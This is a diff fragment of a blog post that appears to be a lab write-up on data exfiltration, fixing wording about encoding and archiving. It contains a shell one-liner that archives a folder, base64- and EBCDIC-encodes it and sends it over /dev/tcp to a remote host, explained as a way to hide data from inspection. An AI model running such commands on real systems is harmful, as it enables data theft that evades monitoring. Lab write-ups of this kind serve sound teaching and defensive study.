CSpanias/cspanias.github.io/_posts/2023-10-20-Data Exfiltration.md

     ![Connect to victim1 from Jumpbox](ssh-from-jb-to-victim1.png)

 3. Now, we will use the **TCP Socket exfiltration** method.
-We will also use **data encoding**, a reversible form of data representation, and **archiving** so it is hard for someone to examine them during the trasmission, as it will be in a non-human readable format.
+We will also use **data encoding**, a reversible form of data representation, and **archiving**, so it is hard for someone to examine the data during the trasmission, as it will be in a non-human readable format.

     ```shell
     tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080